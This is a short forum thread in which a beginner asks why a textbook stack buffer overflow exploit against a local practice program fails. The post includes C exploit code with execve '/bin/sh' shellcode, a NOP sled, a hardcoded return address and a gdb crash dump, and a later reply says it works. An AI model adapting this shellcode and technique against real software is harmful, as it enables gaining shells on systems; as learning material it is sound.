Results 1 to 3 of 3

Thread: Buffer overflow exploit not working

  1. #1
    Just burned his ISO
    Join Date
    Jun 2007
    Posts
    6

    Default Buffer overflow exploit not working

    Hi, I've followed a dozen tutorials about buffer overflow exploiting but none of them seem to work out. Here is one of the example scripts I'm using to exploit an example program:
    Code:
    #include <unistd.h>
    #include <stdlib.h>
    #include <string.h>
    
    static char shellcode[]=
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh#";
    
    #define NOP 0x90
    #define LEN 1024+8
    #define RET 0xbfffeee0
    
    int main()
    {
        char buffer[LEN]; int i;
    
        /* first fill up the buffer with NOPs */
        for (i=0;i<LEN;i++)
            buffer[i] = NOP;
    
        /* and then the shellcode */
        memcpy(&buffer[LEN-strlen(shellcode)-4],shellcode,strlen(shellcode));
    
        /* and finally the address to return to */
        *(int*)(&buffer[LEN-4]) = RET;
    
        /* run program with buffer as parameter */
        execlp("./vuln","./vuln",buffer,NULL);
    
        return 0;
    }
    Has this something to do with Backtrack? As it seems that I'm overwriting the return address with the esp... I've searched a lot for a solution but I didn't find anything.

    Code:
    bt bof2 # exploit
    string is Ű^1└FF
                    ░
                     ˇ1Ď═Ŕń   /bin/sh#đţ ┐
    Segmentation fault (core dumped)
    bt bof2 # gdb exploit core
    GNU gdb 6.6
    Copyright (C) 2006 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i486-slackware-linux"...
    Using host libthread_db library "/lib/libthread_db.so.1".
    
    warning: core file may not match specified executable file.
    
    warning: Can't read pathname for load map: Input/output error.
    Reading symbols from /lib/libc.so.6...done.
    Loaded symbols for /lib/libc.so.6
    Reading symbols from /lib/ld-linux.so.2...done.
    Loaded symbols for /lib/ld-linux.so.2
    Core was generated by `./vuln '.
    Program terminated with signal 11, Segmentation fault.
    #0  0xbfffeed0 in ?? ()
    (gdb) info registers
    eax            0x415    1045
    ecx            0x400    1024
    edx            0xb7fcc0b0       -1208172368
    ebx            0xbfffef00       -1073746176
    esp            0xbfffeed0       0xbfffeed0
    ebp            0x2368732f       0x2368732f
    esi            0xb8000ce0       -1207956256
    edi            0x0      0
    eip            0xbfffeed0       0xbfffeed0
    eflags         0x210286 [ PF SF IF RF ID ]
    cs             0x73     115
    ss             0x7b     123
    ds             0x7b     123
    es             0x7b     123
    fs             0x0      0
    gs             0x33     51
    I'm new to buffer overflowing and I actually don't see the whole picture so I'm starting easy, but even that won't work

    ~Snuffeldog

  2. #2
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

  3. #3
    Just burned his ISO
    Join Date
    Jun 2007
    Posts
    6

    Default

    Ive read that but it didn't look like my problem as I already got the stack pointer, or don't I? So do I have to get the stack adress on runtime as they do in the other topic?

    [EDIT]
    I guess I didn't have the address of the stack pointer as it does work when I'm using the script in the other topic..
    But anyways, it works now and I'm going to search some more information on finding the stack address =)
    Thanks a lot for your answer ^^

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •